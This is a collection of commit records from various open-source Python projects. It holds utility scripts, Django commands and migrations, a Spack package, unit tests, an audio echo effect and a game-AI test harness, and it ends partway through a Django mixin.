| bsd-3-clause | Python |
|
86baa4f437cf3892c15a56e8331c19b6d2e63b1d | Add a script for generating unicode name table | GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters | lib/gen-names.py | lib/gen-names.py | #!/usr/bin/python3
# Input: https://www.unicode.org/Public/UNIDATA/UnicodeData.txt
import io
import re
class Builder(object):
    """Build the C character-name lookup table from UnicodeData.txt."""

    def __init__(self):
        pass

    def read(self, infile):
        """Parse UnicodeData.txt-style lines into (codepoint, name) pairs.

        Comment lines ('#'), blank lines, and entries whose name starts
        with '<' (controls and special block markers) are skipped.
        """
        names = []
        for line in infile:
            if line.startswith('#'):
                continue
            line = line.strip()
            if len(line) == 0:
                continue
            (codepoint, name, _other) = line.split(';', 2)
            # Names starting with < are signifying controls and special blocks,
            # they aren't useful for us
            if name[0] == '<':
                continue
            names.append((codepoint, name))
        return names

    def write(self, data):
        """Print the character_names C table for the given pairs."""
        # (Removed unused accumulator variables from the original version.)
        print('''\
struct CharacterName
{
gunichar uc;
const char *name;
};''')
        print('static const struct CharacterName character_names[] =\n {')
        for codepoint, name in data:
            print(' {{ 0x{0}, "{1}" }},'.format(codepoint, name))
        print(' };')
if __name__ == '__main__':
    import argparse

    parser = argparse.ArgumentParser(description='build')
    parser.add_argument('infile', type=argparse.FileType('r'),
                        help='input file')
    args = parser.parse_args()

    builder = Builder()
    # Re-open with utf-8-sig so a leading BOM is transparently dropped.
    # FIXME: argparse.FileType(encoding=...) is available since Python 3.4
    data = builder.read(io.open(args.infile.name, encoding='utf_8_sig'))
    builder.write(data)
| bsd-3-clause | Python |
|
a50190fe04e434ce70f6b02027e281a896dbb81b | Create Python password hasher | drussell393/Linux-Password-Hash | passwordhash.py | passwordhash.py | #!/usr/bin/env python
# Password Hashing Module for Linux
# Author: Dave Russell Jr (drussell393)
from getpass import getpass
import crypt
# If you like Python 2, please to be importing.
import os
import binascii
password = getpass('Enter your desired password, Harry: ')
passwordConfirm = getpass('Confirm your password: ')

if (password == passwordConfirm):
    # hexlify() returns bytes on Python 3, so the original '$6$' + hexlify(...)
    # concatenation raised TypeError there; decoding keeps the script working
    # on both Python 2 and 3.  '$6$' selects SHA-512 crypt.
    salt = '$6$' + binascii.hexlify(os.urandom(4)).decode('ascii')
    passwordHash = crypt.crypt(password, salt)
    # Python 3-only alternative (mksalt doesn't exist in Python 2):
    #passwordHash = crypt.crypt(password, crypt.mksalt(crypt.METHOD_SHA512))
    print('You\'re a wizard, Harry: ' + passwordHash)
else:
    print('Dobby has heard of your greatness, sir. But of your goodness, Dobby never knew.')
    print('Your confirmation password didn\'t match, Oh Great One.')
| mit | Python |
|
961e9b031b94a0533c53c29787660ab954b6db37 | Add patch-weight.py, patch weight into phrase segs. | SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec | patch-weight.py | patch-weight.py | #!/usr/bin/env python
# -*- coding: utf-8
from codecs import open
from argparse import ArgumentParser
DEBUG_FLAG = False
def load_weight_dict(weight_file):
    """Load a whitespace-separated word/weight file into a dict.

    Lines that don't have exactly two fields are skipped; if a word
    appears more than once, the first weight wins.
    """
    weights = {}
    with open(weight_file, 'r') as handle:
        for raw_line in handle:
            fields = raw_line.strip().split()
            if len(fields) != 2:
                continue
            token, value = fields
            if token not in weights:
                weights[token] = float(value)
    return weights
def main():
    """Normalize word weights within each phrase segmentation and print them.

    Reads a word->weight TSV and a phrase TSV (original phrase, tab,
    segmented phrase), then prints each phrase with per-word weights
    normalized to sum to 1 within that phrase (raw zeros are kept when
    the sum is zero).
    """
    parser = ArgumentParser()
    parser.add_argument("weight_file", help = "word-weight in tsv format")
    parser.add_argument("phrase_file", help = "phrase segment file (original phrase and segmented phrase) one phrase per line in tsv format")
    args = parser.parse_args()

    phrase_file = args.phrase_file
    weight_file = args.weight_file

    weight_dict = load_weight_dict(weight_file)
    word_set = set(weight_dict)
    with open(phrase_file, 'r') as fd:
        for line in fd:
            splited_line = line.strip().split("\t")
            if len(splited_line) != 2:
                continue
            phrase_str, phrase_seg = splited_line
            phrase_seg_list = phrase_seg.split()
            phrase_seg_set = set(phrase_seg_list)
            # Words missing from the weight table get weight 0 (reported
            # when DEBUG_FLAG is on).
            outside_word_set = phrase_seg_set - word_set
            if len(outside_word_set) > 0:
                if DEBUG_FLAG:
                    print "###outsidewords###", " ".join(list(outside_word_set))
                for word in outside_word_set:
                    weight_dict[word] = 0.0
            weight_sum = sum([weight_dict[word] for word in phrase_seg_list])
            if DEBUG_FLAG:
                # Debug output: word/weight pairs, space separated.
                if weight_sum == 0.0:
                    res_list = ["%s/%s" % (word, weight_dict[word]) for word in phrase_seg_list]
                else:
                    res_list = ["%s/%s" % (word, weight_dict[word] / weight_sum) for word in phrase_seg_list]
                print "%s\t%s" % (phrase_str, " ".join(res_list))
            else:
                if weight_sum == 0.0:
                    res_list = ["%s%s" % (word, weight_dict[word]) for word in phrase_seg_list]
                else:
                    res_list = ["%s%s" % (word, weight_dict[word] / weight_sum) for word in phrase_seg_list]
                print "%s\t%s" % (phrase_str, "".join(res_list))
if __name__ == "__main__":
main()
| apache-2.0 | Python |
|
9e51fc305f21a4031b6ec94ccfa39ef1e611da9e | add script to compare DFAs. | sbc100/native_client,sbc100/native_client,sbc100/native_client,nacl-webkit/native_client,nacl-webkit/native_client,sbc100/native_client,sbc100/native_client,nacl-webkit/native_client,sbc100/native_client,nacl-webkit/native_client,nacl-webkit/native_client | src/trusted/validator_ragel/unreviewed/compare_dfa.py | src/trusted/validator_ragel/unreviewed/compare_dfa.py | #!/usr/bin/python
# Copyright (c) 2013 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import dfa_parser
visited_pairs = set()
def Traverse(state1, state2, path):
if (state1, state2) in visited_pairs:
return
if state1.is_accepting != state2.is_accepting:
print map(hex, path)
print state1.is_accepting
print state2.is_accepting
sys.exit(1)
visited_pairs.add((state1, state2))
for byte in range(256):
new_path = path + [byte]
t1 = state1.forward_transitions.get(byte)
t2 = state2.forward_transitions.get(byte)
if (t1 is None) != (t2 is None):
print map(hex, new_path)
print t1 is not None
print t2 is not None
sys.exit(1)
if t1 is None:
continue
Traverse(t1.to_state, t2.to_state, new_path)
def main():
filename1, filename2 = sys.argv[1:]
_, start_state1 = dfa_parser.ParseXml(filename1)
_, start_state2 = dfa_parser.ParseXml(filename2)
Traverse(start_state1, start_state2, [])
print 'automata are equivalent'
if __name__ == '__main__':
main()
| bsd-3-clause | Python |
|
3cdee1d40d3370686c9bff435a4575e985c121e9 | Create __init__.py | odb9402/OPPA,odb9402/OPPA,odb9402/OPPA,odb9402/OPPA | pfc/__init__.py | pfc/__init__.py | """pfc"""
| mit | Python |
|
438471a4a3b41637c5c1eb3c2e07d9d8ca81ee09 | Add a stats ./manage.py command | UrLab/DocHub,UrLab/beta402,UrLab/beta402,UrLab/DocHub,UrLab/DocHub,UrLab/DocHub,UrLab/beta402 | www/management/commands/stats.py | www/management/commands/stats.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
# Copyright 2014, Cercle Informatique ASBL. All rights reserved.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This software was made by hast, C4, ititou at UrLab, ULB's hackerspace
from django.core.management.base import BaseCommand
from users.models import User
from telepathy.models import Thread, Message
from documents.models import Document
class Command(BaseCommand):
help = 'Numbers on b402'
def handle(self, *args, **options):
Print = self.stdout.write
Print("User summary :\n")
Print("{} users\n".format(User.objects.count()))
Print("\n")
Print("Document summary :\n")
Print("{} documents\n".format(Document.objects.count()))
Print(" - {} IN_QUEUE\n".format(Document.objects.filter(state="IN_QUEUE").count()))
Print(" - {} PROCESSING\n".format(Document.objects.filter(state="PROCESSING").count()))
Print(" - {} PREPARING\n".format(Document.objects.filter(state="PREPARING").count()))
Print(" - {} READY_TO_QUEUE\n".format(Document.objects.filter(state="READY_TO_QUEUE").count()))
Print(" - {} ERROR\n".format(Document.objects.filter(state="ERROR").count()))
Print(" - {} DONE\n".format(Document.objects.filter(state="DONE").count()))
Print("\n")
Print("Thread summary :\n")
Print("{} threads\n".format(Thread.objects.count()))
Print("{} messages\n".format(Message.objects.count()))
Print("\n")
| agpl-3.0 | Python |
|
633e540a1718a5cc515725b13d3f1740bb950bb6 | Use GitHub URL for ImageMagick | lgarren/spack,matthiasdiener/spack,lgarren/spack,LLNL/spack,EmreAtes/spack,lgarren/spack,iulian787/spack,iulian787/spack,skosukhin/spack,EmreAtes/spack,LLNL/spack,matthiasdiener/spack,krafczyk/spack,tmerrick1/spack,skosukhin/spack,EmreAtes/spack,krafczyk/spack,skosukhin/spack,krafczyk/spack,tmerrick1/spack,mfherbst/spack,TheTimmy/spack,LLNL/spack,matthiasdiener/spack,krafczyk/spack,mfherbst/spack,mfherbst/spack,skosukhin/spack,krafczyk/spack,LLNL/spack,tmerrick1/spack,TheTimmy/spack,matthiasdiener/spack,LLNL/spack,TheTimmy/spack,lgarren/spack,TheTimmy/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,EmreAtes/spack,tmerrick1/spack,lgarren/spack,skosukhin/spack,iulian787/spack,matthiasdiener/spack,tmerrick1/spack,iulian787/spack,TheTimmy/spack | var/spack/repos/builtin/packages/ImageMagick/package.py | var/spack/repos/builtin/packages/ImageMagick/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Imagemagick(Package):
"""ImageMagick is a software suite to create, edit, compose,
or convert bitmap images."""
homepage = "http://www.imagemagick.org"
url = "https://github.com/ImageMagick/ImageMagick/archive/7.0.2-7.tar.gz"
version('7.0.2-7', 'c59cdc8df50e481b2bd1afe09ac24c08')
version('7.0.2-6', 'aa5689129c39a5146a3212bf5f26d478')
depends_on('jpeg')
depends_on('libtool', type='build')
depends_on('libpng')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libtiff')
depends_on('ghostscript')
def url_for_version(self, version):
return "https://github.com/ImageMagick/ImageMagick/archive/{0}.tar.gz".format(version)
def install(self, spec, prefix):
configure('--prefix={0}'.format(prefix))
make()
make('check')
make('install')
| ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Imagemagick(Package):
"""ImageMagick is a software suite to create, edit, compose,
or convert bitmap images."""
homepage = "http://www.imagemagick.org"
url = "http://www.imagemagick.org/download/ImageMagick-7.0.2-6.tar.gz"
version('7.0.2-6', 'c29c98d2496fbc66adb05a28d8fad21a')
depends_on('jpeg')
depends_on('libtool', type='build')
depends_on('libpng')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libtiff')
depends_on('ghostscript')
def install(self, spec, prefix):
configure('--prefix={0}'.format(prefix))
make()
make('check')
make('install')
| lgpl-2.1 | Python |
3ba109622c24bd52f32e605c523249e1c26b0207 | Add regression test with non ' ' space character as token | banglakit/spaCy,banglakit/spaCy,explosion/spaCy,Gregory-Howard/spaCy,Gregory-Howard/spaCy,raphael0202/spaCy,banglakit/spaCy,banglakit/spaCy,oroszgy/spaCy.hu,explosion/spaCy,recognai/spaCy,explosion/spaCy,oroszgy/spaCy.hu,explosion/spaCy,Gregory-Howard/spaCy,oroszgy/spaCy.hu,explosion/spaCy,banglakit/spaCy,recognai/spaCy,raphael0202/spaCy,recognai/spaCy,Gregory-Howard/spaCy,spacy-io/spaCy,raphael0202/spaCy,honnibal/spaCy,oroszgy/spaCy.hu,recognai/spaCy,aikramer2/spaCy,spacy-io/spaCy,raphael0202/spaCy,aikramer2/spaCy,Gregory-Howard/spaCy,aikramer2/spaCy,honnibal/spaCy,aikramer2/spaCy,aikramer2/spaCy,oroszgy/spaCy.hu,spacy-io/spaCy,recognai/spaCy,raphael0202/spaCy,aikramer2/spaCy,Gregory-Howard/spaCy,spacy-io/spaCy,banglakit/spaCy,spacy-io/spaCy,oroszgy/spaCy.hu,explosion/spaCy,raphael0202/spaCy,honnibal/spaCy,spacy-io/spaCy,honnibal/spaCy,recognai/spaCy | spacy/tests/regression/test_issue834.py | spacy/tests/regression/test_issue834.py | # coding: utf-8
from io import StringIO
word2vec_str = """, -0.046107 -0.035951 -0.560418
de -0.648927 -0.400976 -0.527124
. 0.113685 0.439990 -0.634510
-1.499184 -0.184280 -0.598371"""
def test_issue834(en_vocab):
f = StringIO(word2vec_str)
vector_length = en_vocab.load_vectors(f)
assert vector_length == 3
| mit | Python |
|
d11707e651d4b44ef706f62677ba6a617102f239 | Add test-code | kiyomaro927/bicamon,kiyomaro927/bicamon,kiyomaro927/bicamon | test/post_test.py | test/post_test.py | import json
import urllib2
data = {
"cells":["ECT","VISC", "AAA"]
}
req = urllib2.Request('http://localhost:5000/api')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(data))
| bsd-3-clause | Python |
|
480852bb1dd6796b7fb12e40edc924b9a4dbee60 | Add tests to cover no framework, no problem | undertherain/benchmarker,undertherain/benchmarker,undertherain/benchmarker,undertherain/benchmarker | test/test_misc.py | test/test_misc.py | import unittest
from .helpers import run_module
class MiscTests(unittest.TestCase):
def setUp(self):
self.name = "benchmarker"
def test_no_framework(self):
with self.assertRaises(Exception):
run_module(self.name)
def test_no_problem(self):
with self.assertRaises(Exception):
run_module(self.name, "--framework=pytorch")
| mpl-2.0 | Python |
|
ae372375a7160978eb56ef9b710027887a844d6f | add tests, now i am cool. | nickweinberg/werewolf-slackbot | test_app_input.py | test_app_input.py | """
Test sending data to process_message.
"""
import pytest
from plugins.werewolf import app
from plugins.werewolf.user_map import get_user_map, set_user_map, reset_user_map
def get_empty_game_state():
# hi there
# make mock game state.
# we'll have several fixtures
# and a basic one we can set up in each test.
return {'players':{},
'votes':{},
'STATUS': 'INACTIVE',
'ROUND': None
}
def get_fake_game_state():
return {
'players': {
'ab': {
'name': 'nick',
'DM': 'dm channel',
'role': 'v',
'side': 'v',
'status': 'alive'
},
'cd': {
'name': 'not_nick',
'dm': 'dm channel',
'role': 'w',
'side': 'w',
'status': 'alive'
}
},
'votes': {},
'STATUS': 'RUNNING',
'ROUND': 'night'
}
def setup_users(g):
# for users in g
# setup an appropriate user map.
for player in g['players'].keys():
set_user_map(g, player, g['players'][player]['name'])
def tear_down():
reset_user_map()
def test_setup_users():
night_g = get_fake_game_state()
setup_users(night_g)
test_user_map = get_user_map(night_g)
players = night_g['players'].keys()
p1_id = players[0]
p2_id = players[1]
assert test_user_map.id_dict[p1_id] == 'nick'
assert test_user_map.id_dict[p2_id] == 'not_nick'
assert test_user_map.name_dict['nick'] == p1_id
assert test_user_map.name_dict['not_nick'] == p2_id
tear_down()
def test_basic_input():
fake_message = {'text': 'sup noob', 'user':'ab'}
night_g = get_fake_game_state()
result = app.process_message(fake_message, night_g)
assert result == None
tear_down()
def test_no_vote_target_input():
fake_message = {'text': '!vote', 'user': 'ab'}
night_g = get_fake_game_state()
setup_users(night_g)
result = app.process_message(fake_message, night_g)
assert result == 'Not a valid command.'
tear_down()
def test_vote_user_not_in_game_input():
fake_message = {'text': '!vote cd', 'user': 'cat'}
night_g = get_fake_game_state()
setup_users(night_g)
message = app.process_message(fake_message, night_g)
assert message == 'User not in the game.'
tear_down()
def test_night_vote_input():
fake_message = {'text': '!vote not_nick', 'user': 'ab'}
night_g = get_fake_game_state()
setup_users(night_g)
message = app.process_message(fake_message, night_g)
assert message == 'It is not day.'
tear_down()
def test_day_voting_input():
fake_message = {'text': '!vote not_nick', 'user': 'ab'}
user_name = 'nick'
target_name = 'not_nick'
day_g = get_fake_game_state()
day_g['ROUND'] = 'day'
setup_users(day_g)
assert day_g['votes'] == {}
message = app.process_message(fake_message, day_g)
assert message == user_name + ' voted for ' + target_name
tear_down()
| mit | Python |
|
431760d7a840543901fc1ebc0069ecd384302101 | Add tests/conftest.py for py.test | klothe/pymssql,ramiro/pymssql,klothe/pymssql,zerolugithub/pymssql,JimDennis/pymssql,klothe/pymssql,pymssql/pymssql,bladams/pymssql,ramiro/pymssql,bladams/pymssql,bladams/pymssql,ramiro/pymssql,Aloomaio/pymssql,zerolugithub/pymssql,zerolugithub/pymssql,JimDennis/pymssql,Aloomaio/pymssql,pymssql/pymssql,JimDennis/pymssql,Aloomaio/pymssql | tests/conftest.py | tests/conftest.py | import decimal
import os
try:
# Python 2
from ConfigParser import ConfigParser
except ImportError:
# Python 3
from configparser import ConfigParser
import tests.helpers as th
from .helpers import cfgpath, clear_db, get_app_lock, release_app_lock
_parser = ConfigParser({
'server': 'localhost',
'username': 'sa',
'password': '',
'database': 'tempdb',
'port': '1433',
'ipaddress': '127.0.0.1',
'instance': '',
})
def pytest_addoption(parser):
parser.addoption(
"--pymssql-section",
type="string",
default=os.environ.get('PYMSSQL_TEST_CONFIG', 'DEFAULT'),
help="The name of the section to use from tests.cfg"
)
def pytest_configure(config):
_parser.read(cfgpath)
section = config.getoption('--pymssql-section')
if not _parser.has_section(section) and section != 'DEFAULT':
raise ValueError('the tests.cfg file does not have section: %s' % section)
th.config.server = os.getenv('PYMSSQL_TEST_SERVER') or _parser.get(section, 'server')
th.config.user = os.getenv('PYMSSQL_TEST_USERNAME') or _parser.get(section, 'username')
th.config.password = os.getenv('PYMSSQL_TEST_PASSWORD') or _parser.get(section, 'password')
th.config.database = os.getenv('PYMSSQL_TEST_DATABASE') or _parser.get(section, 'database')
th.config.port = os.getenv('PYMSSQL_TEST_PORT') or _parser.get(section, 'port')
th.config.ipaddress = os.getenv('PYMSSQL_TEST_IPADDRESS') or _parser.get(section, 'ipaddress')
th.config.instance = os.getenv('PYMSSQL_TEST_INSTANCE') or _parser.get(section, 'instance')
th.config.orig_decimal_prec = decimal.getcontext().prec
get_app_lock()
clear_db()
def pytest_unconfigure(config):
release_app_lock()
| lgpl-2.1 | Python |
|
bceee12d94924931ff73b45d2ed3de8b3d71522c | Add case fixture to top-level conftest.py in tests | amolenaar/gaphor,amolenaar/gaphor | tests/conftest.py | tests/conftest.py | import pytest
from gaphor.conftest import Case
@pytest.fixture
def case():
case = Case()
yield case
case.shutdown()
| lgpl-2.1 | Python |
|
0146058fe8a5c91ce33102bb55f5f087428a03a3 | Add tests for get_keeper_token | lsst-sqre/ltd-mason,lsst-sqre/ltd-mason | tests/test_cli.py | tests/test_cli.py | """Test the ltd-mason CLI features."""
from base64 import b64encode
import responses
import pytest
from ltdmason.cli import get_keeper_token
@responses.activate
def test_get_keeper_token():
"""Test getting a token from LTD Keeper."""
expected_json = {'token': 'shake-it-off-shake-it-off'}
responses.add(
responses.GET,
'http://localhost:5000/token',
json=expected_json,
status=200)
_auth_header = 'Basic ' + b64encode(('user:pass')
.encode('utf-8')).decode('utf-8')
token = get_keeper_token('http://localhost:5000', 'user', 'pass')
assert responses.calls[0].request.url == 'http://localhost:5000/token'
assert responses.calls[0].request.headers['Authorization'] \
== _auth_header
assert token == 'shake-it-off-shake-it-off'
@responses.activate
def test_get_keeper_token_error():
"""Test with server error."""
expected_json = {'token': 'shake-it-off-shake-it-off'}
responses.add(
responses.GET,
'http://localhost:5000/token',
json=expected_json,
status=401)
with pytest.raises(RuntimeError):
get_keeper_token('http://localhost:5000', 'user', 'pass')
| mit | Python |
|
e1e8bef8c2c916505e9bdc0ea37c81a7626db6af | Add int tests | nkantar/Parsenvy | tests/test_int.py | tests/test_int.py | import pytest
import parsenvy
def test_int_positive(monkeypatch):
"""'13'"""
monkeypatch.setenv("foo", "13")
assert parsenvy.int("foo") == 13
def test_int_negative(monkeypatch):
"""'-42'"""
monkeypatch.setenv("foo", "-42")
assert parsenvy.int("foo") == -42
def test_int_zero(monkeypatch):
"""'0'"""
monkeypatch.setenv("foo", "0")
assert parsenvy.int("foo") == 0
def test_int_negative_zero(monkeypatch):
"""'-0'"""
monkeypatch.setenv("foo", "-0")
assert parsenvy.int("foo") == 0
def test_int_invalid(monkeypatch):
"""'bar'"""
monkeypatch.setenv("foo", "bar")
with pytest.raises(TypeError):
parsenvy.int("foo")
def test_int_empty(monkeypatch):
"""''"""
monkeypatch.setenv("foo", "")
with pytest.raises(TypeError):
parsenvy.int("foo")
| bsd-3-clause | Python |
|
3b66fbc844b023003420db7a9986811110f55489 | Add tests for the run() function | Pythonity/icon-font-to-png | tests/test_run.py | tests/test_run.py | import sys
import tempfile
import unittest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import icon_font_to_png
class TestRun(unittest.TestCase):
def create_css_file(self, contents):
css_file = tempfile.NamedTemporaryFile()
css_file.write(contents.encode('utf-8'))
css_file.flush()
return css_file
def test_usage(self):
orig_stderr = sys.stderr
sys.stderr = StringIO()
self.assertRaises(SystemExit, icon_font_to_png.run,
['icon_font_to_png.py'])
err = sys.stderr.getvalue().strip()
self.assertRegexpMatches(err, '^usage: .*')
sys.stderr = orig_stderr
def test_list(self):
css_file = self.create_css_file(
".foo-xyzzy:before { content: '\\f003' }\n"
".foo-baz:before { content: '\\f002' }\n"
".foo-bar:before { content: '\\f001' }\n"
)
orig_stdout = sys.stdout
sys.stdout = StringIO()
self.assertRaisesRegexp(SystemExit, '^0',
icon_font_to_png.run, ['foo.ttf', css_file.name, 'bar', '--list'])
out = sys.stdout.getvalue()
self.assertEqual(out,
"bar\n"
"baz\n"
"xyzzy\n"
)
sys.stdout = StringIO()
self.assertRaisesRegexp(SystemExit, '^0',
icon_font_to_png.run, ['foo.ttf', css_file.name, 'bar', '--list',
'--keep-prefix'])
out = sys.stdout.getvalue()
self.assertEqual(out,
"foo-bar\n"
"foo-baz\n"
"foo-xyzzy\n"
)
sys.stdout = orig_stdout
if __name__ == '__main__':
unittest.main
| mit | Python |
|
578de6c57f9698c7e273af06d1e815f71269bb18 | Add a sample python file interesting to debug | audaxis/ikpdb,audaxis/ikpdb | tests/to_debug.py | tests/to_debug.py | import sys
import os
import time
import threading
import ikpdb
TEST_MULTI_THREADING = False
TEST_EXCEPTION_PROPAGATION = False
TEST_POSTMORTEM = True
TEST_SYS_EXIT = 0
TEST_STEPPING = False
# Note that ikpdb.set_trace() will reset/mess breakpoints set using GUI
TEST_SET_TRACE = False
TCB = TEST_CONDITIONAL_BREAKPOINT = True
class Worker(object):
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
work_count = n
while self._running and n > 0:
print "Worker: Doing iteration: %s" % (work_count - n)
if n == 3:
pass # ikpdb.set_trace()
n -= 1
time.sleep(2)
ga = 5
gb ="coucou"
g_dict = {"Genesis": 1, "Don't Look Back": 2, 'array': [1,3,{'coucou': 3.14}]}
a_tuple = (1,'e', 3.14, ['a', 'b'])
class BigBear:
color = "white"
def __init__(self, name='unknown'):
self._name = name
def grumble(self):
print "Roaaarrrrrrr"
def sub_function():
return True
def the_function(p_nb_seconds):
a_var = 18.3
the_function_local_list = [1,2,3,'cyril']
a_beast = BigBear()
print "ga=%s" % ga
print "Hello World"
print "Ceci est la ligne avec le point d'arret"
for loop_idx in range(p_nb_seconds):
print "hello @ %s seconds" % loop_idx
time.sleep(1)
if loop_idx == 12:
if TEST_SET_TRACE:
ikpdb.set_trace() # will break on next line
pass # Need this for set_trace()
a_var = 98.3
sub_function()
def sub_raiser():
raise Exception("Prends ca dans ta bouille")
def raiser():
try:
sub_raiser()
except Exception as e:
raise e
if __name__=='__main__':
b = 0
main_bear = BigBear("Cyril")
print "Type of main_bear=%s" % type(main_bear)
print "sys.argv=%s" % sys.argv
if TEST_SYS_EXIT:
sys.exit(TEST_SYS_EXIT)
if TEST_EXCEPTION_PROPAGATION:
raiser()
if TEST_MULTI_THREADING:
w = Worker()
t = threading.Thread(target=w.run, args=(5,))
t.start()
duration = 2 if TEST_STEPPING else 15
the_function(duration)
if TEST_MULTI_THREADING:
w.terminate()
t.join()
print "finished"
if TEST_POSTMORTEM:
print 5 / b
| mit | Python |
|
329270ddef5f4da4528750ebc463ffc910325ec8 | add migration | pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro,pulilab/rapidpro | temba/channels/migrations/0066_auto_20170306_1713.py | temba/channels/migrations/0066_auto_20170306_1713.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-06 17:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('channels', '0065_auto_20170228_0837'),
]
operations = [
migrations.AlterField(
model_name='channelsession',
name='status',
field=models.CharField(choices=[('P', 'Pending'), ('Q', 'Queued'), ('R', 'Ringing'), ('I', 'In Progress'), ('D', 'Complete'), ('B', 'Busy'), ('F', 'Failed'), ('N', 'No Answer'), ('C', 'Canceled'), ('X', 'Interrupted'), ('T', 'Triggered'), ('A', 'Initiated')], default='P', help_text='The status of this session', max_length=1),
),
]
| agpl-3.0 | Python |
|
a8caef202ba0fd6909359241ff385eca762aca1f | Add echo effect | martinmcbride/pysound | quack/effects.py | quack/effects.py | # Author: Martin McBride
# Created: 2018-09-25
# Copyright (C) 2018, Martin McBride
# License: MIT
import math
import numpy as np
from quack.buffer import create_buffer
def echo(params, source, delay, strength):
'''
Create an echo
:param params:
:param source:
:param delay:
:param strength:
:return:
'''
source = create_buffer(params, source)
delay = create_buffer(params, delay)
strength = create_buffer(params, strength)
output = source[:]
for i in range(params.length):
d = int(i - delay[i])
if 0 <= d < params.length:
output[i] += source[d]*strength[i]
return output
| mit | Python |
|
bdd7016fe8f41abdc8562d114efc41622916a675 | Create startBackEnd.py | fabiomssilva/AWSControl,fabiomssilva/AWSControl | startBackEnd.py | startBackEnd.py | #!/usr/bin/python
import boto.ec2
conn = boto.ec2.connect_to_region("eu-central-1", aws_access_key_id='AKIAI111111111111111', aws_secret_access_key='keyyyyy')
instance = conn.get_all_instances(instance_ids=['i-40eb8111'])
print instance[0].instances[0].start()
| mit | Python |
|
f6f2c6fc2a51bb3243d9b99ab1093809a2d1a5bb | Add script that tests AI players | giovannipcarvalho/dots-and-boxes | test_players.py | test_players.py | from AI import *
import random
def RandomPlayer(game):
return 0, random.choice(game.get_available_moves())
def ABPlayer(game):
return alpha_beta_search(game, 8, -np.inf, np.inf, True, evaluate_base)
def ABChainPlayer1(game):
return alpha_beta_search(game, 7, -np.inf, np.inf, True, evaluate_chain_len)
def ABChainPlayer2(game):
return alpha_beta_search(game, 7, -np.inf, np.inf, True, evaluate_chain_count)
players = [ABChainPlayer2, ABPlayer]
player_names = tuple((map(lambda x: x.__name__, players)))
print "%s v. %s" % player_names
game = DotsAndBoxes(-1, 4, 4)
while not game.is_over():
play_fn = players[game.turn == 1]
print "\tTurn: %s" % (player_names[game.turn == 1])
score, move = play_fn(game)
game.play(move)
print "\tPlayed: %d %d" % (move)
print "\tEvaluated score: %d\n" % (score)
print "Winner: %s" % (player_names[np.argmax(game.score)])
print game.score | mit | Python |
|
0cf85c1ab68ddc50787e6a09f3604320d18118b4 | Add UniqueForFieldsMixin | ashleywaite/django-more | django_more/mixins.py | django_more/mixins.py | from django.db.models.options import normalize_together
from django.utils.functional import cached_property
# Used by OrderByField to allow for unique_together constraints to be field declared
class UniqueForFieldsMixin:
""" Mixin first to a Field to add a unique_for_fields field option """
unique_for_fields = None
def __init__(self, unique_for_fields=None, *args, **kwargs):
if unique_for_fields:
self.unique_for_fields = tuple(unique_for_fields)
# If unique_for_fields then any unique option is irrelevant
kwargs.pop('unique', None)
super().__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
if self.unique_for_fields:
kwargs['unique_for_fields'] = self.unique_for_fields
return name, path, args, kwargs
def contribute_to_class(self, cls, *args, **kwargs):
super().contribute_to_class(cls, *args, **kwargs)
# Add any necessary unique_together index to the model
if self.unique_for_fields:
# Alter only original_attr to fake being a declared unique_together
# Cannot modify cls._meta.unique_together as it breaks state consistency for migrations
ut = set((self.unique_together, )).union(normalize_together(cls._meta.original_attrs.get('unique_together')))
cls._meta.original_attrs['unique_together'] = ut
@cached_property
def unique_together(self):
